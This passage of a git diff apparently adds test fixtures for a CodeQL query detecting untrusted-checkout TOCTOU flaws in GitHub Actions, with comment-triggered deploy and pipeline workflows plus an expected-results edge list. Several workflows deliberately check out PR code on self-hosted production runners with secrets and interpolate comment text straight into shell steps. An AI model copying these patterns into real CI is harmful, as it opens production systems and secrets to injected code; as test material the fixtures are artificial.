"schedule=False" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Submit pipeline kickoff message to slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Kickoff run + if: contains(github.event.comment.body, '/kickoff') + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }} + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report pipeline's run outcome to slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Prune docker images + run: docker system prune --all --force diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml new file mode 100644 index 000000000000..9444ad0b627c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml @@ -0,0 +1,89 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: > + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + ( + github.event.issue.author_association == 'OWNER' || + github.event.issue.author_association == 'COLLABORATOR' || + github.event.issue.author_association == 'MEMBER' + ) + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml new file mode 100644 index 000000000000..e3e557cc5112 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml @@ -0,0 +1,209 @@ +name: Autodeploy Model to AML + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Install jq + run: sudo apt-get update && sudo apt-get install -y jq + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + deploy: + + name: Update deployment + needs: security-checks + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout main + if: contains(github.event.comment.body, '/rollback') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + run: | + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Notify deployment start in slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Deploy server + if: >- + ${{ + (contains(github.event.comment.body, '/deploy to') || + contains(github.event.comment.body, '/rollback')) && + !contains(github.event.comment.body, 'scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + COMMENT_BODY: ${{ github.event.comment.body }} + run: poetry run python server.py --endpoint_location=remote --autodeploy=True + + - name: Deploy scorer + if: >- + ${{ + contains(github.event.comment.body, '/deploy as async scorer') || + contains(github.event.comment.body, '/rollback async scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report deployment outcome in slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: prune docker images + run: docker system prune --all --force diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml new file mode 100644 index 000000000000..4a6d1452af24 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml @@ -0,0 +1,253 @@ +name: Kickoff custom pipeline + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + contains(github.event.comment.body, '/kickoff') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + full_allowlist="$PR_COMMENT_ALLOW_LIST $(ls models)" + + if `list_subset "echo $full_allowlist" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + docker-environment-creation: + + name: Build and push docker image + needs: security-checks + if: >- + ${{ + contains(github.event.comment.body, 'rebuild') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + needs.security-checks.result == 'success' + }} + runs-on: [self-hosted, production] + + permissions: + contents: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Log into Azure + uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 + with: + creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Container registry login + run: | + echo "Logging into $REGISTRY" + az acr login --name ${REGISTRY} + env: + REGISTRY: ${{ secrets.DOCKER_REGISTRY }} + + - name: Prune old images + run: | + docker system prune -a -f + + - name: Create image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/build_aml_image -m $model + + - name: Push image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/push_aml_image -m $model + + kickoff-pipeline: + + name: Kickoff pipeline + needs: [security-checks, docker-environment-creation] + if: >- + ${{ + always() && + needs.security-checks.result == 'success' && + needs.docker-environment-creation.result != 'failure' && + needs.docker-environment-creation.result != 'cancelled' + }} + + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout PR branch + uses: actions/checkout@v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get pipeline info from comment + id: pipeline-info + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \ + scheduling=$(echo "${{ github.event.comment.body }}" | grep schedule | wc -l) && \ + echo "mdl=$model" >> $GITHUB_OUTPUT + if [[ $scheduling == 1 ]]; then + echo "schedule=True" >> $GITHUB_OUTPUT + else + echo "schedule=False" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Submit pipeline kickoff message to slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Kickoff run + if: contains(github.event.comment.body, '/kickoff') + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }} + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report pipeline's run outcome to slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Prune docker images + run: docker system prune --all --force diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected index 400adb446d26..418aeeea059e 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected @@ -5,12 +5,105 @@ edges | .github/workflows/comment.yml:39:9:54:6 | Uses Step: issue | .github/workflows/comment.yml:54:9:58:6 | Uses Step | | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | -| .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:22:10:27:7 | Uses Step | -| .github/workflows/deployment.yml:22:10:27:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | -| .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | +| .github/workflows/deployment1.yml:16:10:22:7 | Uses Step | .github/workflows/deployment1.yml:22:10:27:7 | Uses Step | +| .github/workflows/deployment1.yml:22:10:27:7 | Uses Step | .github/workflows/deployment1.yml:27:10:30:7 | Run Step | +| .github/workflows/deployment1.yml:27:10:30:7 | Run Step | .github/workflows/deployment1.yml:30:10:31:53 | Run Step | +| .github/workflows/deployment2.yml:16:10:22:7 | Uses Step | .github/workflows/deployment2.yml:22:10:27:7 | Uses Step | +| .github/workflows/deployment2.yml:22:10:27:7 | Uses Step | .github/workflows/deployment2.yml:27:10:30:7 | Run Step | +| .github/workflows/deployment2.yml:27:10:30:7 | Run Step | .github/workflows/deployment2.yml:30:10:31:53 | Run Step | | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | | .github/workflows/label_actor.yml:13:9:17:6 | Uses Step | .github/workflows/label_actor.yml:17:9:17:41 | Run Step | +| .github/workflows/test0.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test0.yml:28:9:32:6 | Uses Step | +| .github/workflows/test0.yml:28:9:32:6 | Uses Step | .github/workflows/test0.yml:32:9:34:2 | Run Step | +| .github/workflows/test0.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test0.yml:54:9:58:6 | Uses Step | +| .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | +| .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | +| .github/workflows/test1.yml:32:7:47:4 | Run Step | .github/workflows/test1.yml:47:7:86:4 | Run Step: environment | +| .github/workflows/test1.yml:47:7:86:4 | Run Step: environment | .github/workflows/test1.yml:86:7:92:4 | Uses Step | +| .github/workflows/test1.yml:86:7:92:4 | Uses Step | .github/workflows/test1.yml:92:7:95:54 | Uses Step | +| .github/workflows/test2.yml:38:7:41:4 | Uses Step | .github/workflows/test2.yml:41:7:44:4 | Run Step | +| .github/workflows/test2.yml:41:7:44:4 | Run Step | .github/workflows/test2.yml:44:7:58:4 | Run Step | +| .github/workflows/test2.yml:44:7:58:4 | Run Step | .github/workflows/test2.yml:58:7:76:2 | Run Step: environment | +| .github/workflows/test2.yml:90:7:94:4 | Uses Step: comment-branch | .github/workflows/test2.yml:94:7:101:4 | Uses Step | +| .github/workflows/test2.yml:94:7:101:4 | Uses Step | .github/workflows/test2.yml:101:7:105:4 | Uses Step | +| .github/workflows/test2.yml:101:7:105:4 | Uses Step | .github/workflows/test2.yml:105:7:111:4 | Uses Step | +| .github/workflows/test2.yml:105:7:111:4 | Uses Step | .github/workflows/test2.yml:111:7:135:4 | Run Step: environment | +| .github/workflows/test2.yml:111:7:135:4 | Run Step: environment | .github/workflows/test2.yml:135:7:141:4 | Run Step: email | +| .github/workflows/test2.yml:135:7:141:4 | Run Step: email | .github/workflows/test2.yml:141:7:149:4 | Run Step: slack-id | +| .github/workflows/test2.yml:141:7:149:4 | Run Step: slack-id | .github/workflows/test2.yml:149:7:169:4 | Uses Step: slack-initiate | +| .github/workflows/test2.yml:149:7:169:4 | Uses Step: slack-initiate | .github/workflows/test2.yml:169:7:174:4 | Uses Step | +| .github/workflows/test2.yml:169:7:174:4 | Uses Step | .github/workflows/test2.yml:174:7:187:4 | Run Step | +| .github/workflows/test2.yml:174:7:187:4 | Run Step | .github/workflows/test2.yml:187:7:198:4 | Run Step | +| .github/workflows/test2.yml:187:7:198:4 | Run Step | .github/workflows/test2.yml:198:7:206:4 | Uses Step | +| .github/workflows/test2.yml:198:7:206:4 | Uses Step | .github/workflows/test2.yml:206:7:226:4 | Uses Step | +| .github/workflows/test2.yml:206:7:226:4 | Uses Step | .github/workflows/test2.yml:226:7:227:45 | Run Step | +| .github/workflows/test3.yml:38:7:56:4 | Run Step: environment | .github/workflows/test3.yml:56:7:60:4 | Uses Step: comment-branch | +| .github/workflows/test3.yml:56:7:60:4 | Uses Step: comment-branch | .github/workflows/test3.yml:60:7:65:4 | Uses Step | +| .github/workflows/test3.yml:60:7:65:4 | Uses Step | .github/workflows/test3.yml:65:7:68:4 | Uses Step | +| .github/workflows/test3.yml:65:7:68:4 | Uses Step | .github/workflows/test3.yml:68:7:83:2 | Run Step | +| .github/workflows/test3.yml:106:7:110:4 | Uses Step: comment-branch | .github/workflows/test3.yml:110:7:115:4 | Uses Step | +| .github/workflows/test3.yml:110:7:115:4 | Uses Step | .github/workflows/test3.yml:115:7:120:4 | Uses Step | +| .github/workflows/test3.yml:115:7:120:4 | Uses Step | .github/workflows/test3.yml:120:7:127:4 | Run Step | +| .github/workflows/test3.yml:120:7:127:4 | Run Step | .github/workflows/test3.yml:127:7:131:4 | Run Step | +| .github/workflows/test3.yml:127:7:131:4 | Run Step | .github/workflows/test3.yml:131:7:136:4 | Run Step | +| .github/workflows/test3.yml:131:7:136:4 | Run Step | .github/workflows/test3.yml:136:7:141:2 | Run Step | +| .github/workflows/test3.yml:169:7:173:4 | Uses Step: comment-branch | .github/workflows/test3.yml:173:7:180:4 | Uses Step | +| .github/workflows/test3.yml:173:7:180:4 | Uses Step | .github/workflows/test3.yml:180:7:185:4 | Uses Step | +| .github/workflows/test3.yml:180:7:185:4 | Uses Step | .github/workflows/test3.yml:185:7:197:4 | Run Step: pipeline-info | +| .github/workflows/test3.yml:185:7:197:4 | Run Step: pipeline-info | .github/workflows/test3.yml:197:7:203:4 | Run Step: email | +| .github/workflows/test3.yml:197:7:203:4 | Run Step: email | .github/workflows/test3.yml:203:7:211:4 | Run Step: slack-id | +| .github/workflows/test3.yml:203:7:211:4 | Run Step: slack-id | .github/workflows/test3.yml:211:7:231:4 | Uses Step: slack-initiate | +| .github/workflows/test3.yml:211:7:231:4 | Uses Step: slack-initiate | .github/workflows/test3.yml:231:7:236:4 | Uses Step | +| .github/workflows/test3.yml:231:7:236:4 | Uses Step | .github/workflows/test3.yml:236:7:242:4 | Run Step | +| .github/workflows/test3.yml:236:7:242:4 | Run Step | .github/workflows/test3.yml:242:7:250:4 | Uses Step | +| .github/workflows/test3.yml:242:7:250:4 | Uses Step | .github/workflows/test3.yml:250:7:270:4 | Uses Step | +| .github/workflows/test3.yml:250:7:270:4 | Uses Step | .github/workflows/test3.yml:270:7:271:45 | Run Step | +| .github/workflows/test4.yml:32:7:47:4 | Run Step | .github/workflows/test4.yml:47:7:79:4 | Run Step: environment | +| .github/workflows/test4.yml:47:7:79:4 | Run Step: environment | .github/workflows/test4.yml:79:7:85:4 | Uses Step | +| .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | +| .github/workflows/test5.yml:38:7:41:4 | Uses Step | .github/workflows/test5.yml:41:7:44:4 | Run Step | +| .github/workflows/test5.yml:41:7:44:4 | Run Step | .github/workflows/test5.yml:44:7:58:2 | Run Step | +| .github/workflows/test5.yml:72:7:76:4 | Uses Step: comment-branch | .github/workflows/test5.yml:76:7:83:4 | Uses Step | +| .github/workflows/test5.yml:76:7:83:4 | Uses Step | .github/workflows/test5.yml:83:7:87:4 | Uses Step | +| .github/workflows/test5.yml:83:7:87:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | +| .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:93:7:117:4 | Run Step: environment | +| .github/workflows/test5.yml:93:7:117:4 | Run Step: environment | .github/workflows/test5.yml:117:7:123:4 | Run Step: email | +| .github/workflows/test5.yml:117:7:123:4 | Run Step: email | .github/workflows/test5.yml:123:7:131:4 | Run Step: slack-id | +| .github/workflows/test5.yml:123:7:131:4 | Run Step: slack-id | .github/workflows/test5.yml:131:7:151:4 | Uses Step: slack-initiate | +| .github/workflows/test5.yml:131:7:151:4 | Uses Step: slack-initiate | .github/workflows/test5.yml:151:7:156:4 | Uses Step | +| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | +| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | +| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:180:7:188:4 | Uses Step | +| .github/workflows/test5.yml:180:7:188:4 | Uses Step | .github/workflows/test5.yml:188:7:208:4 | Uses Step | +| .github/workflows/test5.yml:188:7:208:4 | Uses Step | .github/workflows/test5.yml:208:7:209:45 | Run Step | +| .github/workflows/test6.yml:38:7:42:4 | Uses Step: comment-branch | .github/workflows/test6.yml:42:7:47:4 | Uses Step | +| .github/workflows/test6.yml:42:7:47:4 | Uses Step | .github/workflows/test6.yml:47:7:50:4 | Uses Step | +| .github/workflows/test6.yml:47:7:50:4 | Uses Step | .github/workflows/test6.yml:50:7:65:2 | Run Step | +| .github/workflows/test6.yml:88:7:92:4 | Uses Step: comment-branch | .github/workflows/test6.yml:92:7:97:4 | Uses Step | +| .github/workflows/test6.yml:92:7:97:4 | Uses Step | .github/workflows/test6.yml:97:7:102:4 | Uses Step | +| .github/workflows/test6.yml:97:7:102:4 | Uses Step | .github/workflows/test6.yml:102:7:109:4 | Run Step | +| .github/workflows/test6.yml:102:7:109:4 | Run Step | .github/workflows/test6.yml:109:7:113:4 | Run Step | +| .github/workflows/test6.yml:109:7:113:4 | Run Step | .github/workflows/test6.yml:113:7:118:4 | Run Step | +| .github/workflows/test6.yml:113:7:118:4 | Run Step | .github/workflows/test6.yml:118:7:123:2 | Run Step | +| .github/workflows/test6.yml:151:7:155:4 | Uses Step: comment-branch | .github/workflows/test6.yml:155:7:162:4 | Uses Step | +| .github/workflows/test6.yml:155:7:162:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | +| .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:167:7:179:4 | Run Step: pipeline-info | +| .github/workflows/test6.yml:167:7:179:4 | Run Step: pipeline-info | .github/workflows/test6.yml:179:7:185:4 | Run Step: email | +| .github/workflows/test6.yml:179:7:185:4 | Run Step: email | 